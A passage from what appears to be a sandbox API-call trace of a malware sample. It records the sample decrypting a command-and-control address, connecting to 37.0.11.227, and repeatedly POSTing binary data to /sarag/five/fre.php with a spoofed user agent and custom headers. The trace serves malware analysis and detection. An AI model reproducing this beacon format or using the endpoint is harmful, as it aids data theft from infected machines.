ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0240.648] GetProcessHeap () returned 0x690000 [0240.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0240.648] socket (af=2, type=1, protocol=6) returned 0x654 [0240.649] connect (s=0x654, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0240.682] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0240.683] GetProcessHeap () returned 0x690000 [0240.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0240.683] GetProcessHeap () returned 0x690000 [0240.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0240.685] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0240.732] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0240.740] GetProcessHeap () returned 0x690000 [0240.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0240.761] GetProcessHeap () returned 0x690000 [0240.762] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0240.762] GetProcessHeap () returned 0x690000 [0240.762] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0240.762] GetProcessHeap () returned 0x690000 [0240.762] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0240.765] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0240.770] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0240.770] GetProcessHeap () returned 0x690000 [0240.770] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0240.770] GetProcessHeap () returned 0x690000 [0240.771] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0240.771] send (s=0x654, buf=0x6ad508*, len=242, flags=0) returned 242 [0240.772] send (s=0x654, buf=0x6aba40*, len=159, flags=0) returned 159 [0240.773] GetProcessHeap () returned 0x690000 [0240.773] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0240.773] recv (in: s=0x654, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0240.939] GetProcessHeap () returned 0x690000 [0240.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0240.943] GetProcessHeap () returned 0x690000 [0240.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0240.944] GetProcessHeap () returned 0x690000 [0240.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0240.945] GetProcessHeap () returned 0x690000 [0240.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0240.946] closesocket (s=0x654) returned 0 [0240.948] GetProcessHeap () returned 0x690000 [0240.948] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0240.948] GetProcessHeap () returned 0x690000 [0240.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0240.949] GetProcessHeap () returned 0x690000 [0240.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0240.949] GetProcessHeap () returned 0x690000 [0240.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0240.952] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd78) returned 0x654 [0240.958] Sleep (dwMilliseconds=0xea60) [0240.959] GetProcessHeap () returned 0x690000 [0240.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0240.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0240.961] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.031] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0241.102] GetProcessHeap () returned 0x690000 [0241.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0241.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.113] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0241.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.124] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.136] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.137] GetProcessHeap () returned 0x690000 [0241.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0241.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.142] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0241.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.146] CryptDestroyKey (hKey=0x69d628) returned 1 [0241.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.149] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0241.159] GetProcessHeap () returned 0x690000 [0241.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0241.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.169] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0241.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.201] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0241.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.211] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0241.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.215] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0241.215] GetProcessHeap () returned 0x690000 [0241.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0241.215] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0241.217] GetProcessHeap () returned 0x690000 [0241.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0241.218] GetProcessHeap () returned 0x690000 [0241.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0241.218] GetProcessHeap () returned 0x690000 [0241.219] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0241.219] GetProcessHeap () returned 0x690000 [0241.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0241.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.223] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.243] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0241.256] GetProcessHeap () returned 0x690000 [0241.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0241.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.258] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0241.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.263] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.265] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.265] GetProcessHeap () returned 0x690000 [0241.265] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0241.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.267] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0241.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.268] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0241.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.269] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0241.269] GetProcessHeap () returned 0x690000 [0241.269] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0241.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.273] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0241.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.275] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0241.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.277] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0241.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.279] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0241.279] GetProcessHeap () returned 0x690000 [0241.279] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0241.279] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0241.279] GetProcessHeap () returned 0x690000 [0241.279] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0241.279] socket (af=2, type=1, protocol=6) returned 0x658 [0241.280] connect (s=0x658, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0241.316] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0241.316] GetProcessHeap () returned 0x690000 [0241.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0241.316] GetProcessHeap () returned 0x690000 [0241.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0241.317] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0241.319] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0241.319] GetProcessHeap () returned 0x690000 [0241.319] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0241.319] GetProcessHeap () returned 0x690000 [0241.320] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0241.320] GetProcessHeap () returned 0x690000 [0241.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0241.320] GetProcessHeap () returned 0x690000 [0241.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0241.321] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0241.322] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0241.322] GetProcessHeap () returned 0x690000 [0241.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0241.322] GetProcessHeap () returned 0x690000 [0241.322] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0241.323] send (s=0x658, buf=0x6ad508*, len=242, flags=0) returned 242 [0241.323] send (s=0x658, buf=0x6aba40*, len=159, flags=0) returned 159 [0241.323] GetProcessHeap () returned 0x690000 [0241.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0241.323] recv (in: s=0x658, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0241.404] GetProcessHeap () returned 0x690000 [0241.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0241.405] GetProcessHeap () returned 0x690000 [0241.406] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0241.406] GetProcessHeap () returned 0x690000 [0241.406] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0241.406] GetProcessHeap () returned 0x690000 [0241.407] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0241.407] closesocket (s=0x658) returned 0 [0241.408] GetProcessHeap () returned 0x690000 [0241.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0241.408] GetProcessHeap () returned 0x690000 [0241.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0241.408] GetProcessHeap () returned 0x690000 [0241.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0241.409] GetProcessHeap () returned 0x690000 [0241.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0241.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf64) returned 0x658 [0241.412] Sleep (dwMilliseconds=0xea60) [0241.414] GetProcessHeap () returned 0x690000 [0241.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0241.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.416] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.427] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0241.440] GetProcessHeap () returned 0x690000 [0241.440] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0241.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.442] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0241.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.444] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.453] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.453] GetProcessHeap () returned 0x690000 [0241.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0241.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.455] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0241.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.457] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0241.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.458] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0241.458] GetProcessHeap () returned 0x690000 [0241.458] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0241.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.459] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0241.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.461] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0241.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.462] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0241.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.463] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0241.464] GetProcessHeap () returned 0x690000 [0241.464] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0241.464] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0241.464] GetProcessHeap () returned 0x690000 [0241.472] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0241.472] GetProcessHeap () returned 0x690000 [0241.472] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0241.473] GetProcessHeap () returned 0x690000 [0241.476] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0241.479] GetProcessHeap () returned 0x690000 [0241.479] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0241.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.481] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0241.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.570] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0241.581] GetProcessHeap () returned 0x690000 [0241.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0241.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.582] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0241.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.583] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0241.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.587] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.587] GetProcessHeap () returned 0x690000 [0241.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0241.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.590] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0241.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.591] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0241.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0241.592] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0241.592] GetProcessHeap () returned 0x690000 [0241.592] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0241.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.593] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0241.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.594] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0241.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.595] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0241.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0241.601] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0241.601] GetProcessHeap () returned 0x690000 [0241.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0241.601] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0241.601] GetProcessHeap () returned 0x690000 [0241.601] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0241.601] socket (af=2, type=1, protocol=6) returned 0x65c [0241.601] connect (s=0x65c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0241.624] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0241.624] GetProcessHeap () returned 0x690000 [0241.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0241.624] GetProcessHeap () returned 0x690000 [0241.625] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0241.626] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0241.627] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 